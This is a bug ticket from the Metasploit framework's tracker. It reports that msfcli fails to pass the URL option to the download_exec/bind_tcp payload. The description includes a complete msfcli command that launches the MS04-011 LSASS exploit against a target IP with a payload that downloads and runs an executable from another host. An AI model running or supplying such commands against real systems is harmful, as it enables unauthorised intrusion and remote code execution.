Ticket #196 (new defect)

Opened 6 months ago

Last modified 6 months ago

Payload "windows/download_exec/bind_tcp" - Cannot set "URL" variable via msfcli

Reported by: anonymous Assigned to: hdm
Priority: minor Milestone: Metasploit 3.2
Component: framework3 Version:
Keywords: Cc:

Description

$ msfcli windows/smb/ms04_011_lsass PAYLOAD=windows/download_exec/bind_tcp URL=http://10.0.0.1:2000/code.exe RHOST=10.0.0.2 O

... results in "URL" still being undefined. Setting "URL" via msfconsole and msfweb works. Enclosing the URL string in quotes (URL="http://10.0.0.1:2000/sample.exe") had no effect.

Change History

02/15/08 15:59:55 changed by anonymous

If one sets and saves "URL" globally via msfconsole, msfcli successfully uses it.

02/20/08 16:55:02 changed by hdm

  • milestone set to Metasploit 3.2.

Odd bug. Will look into it.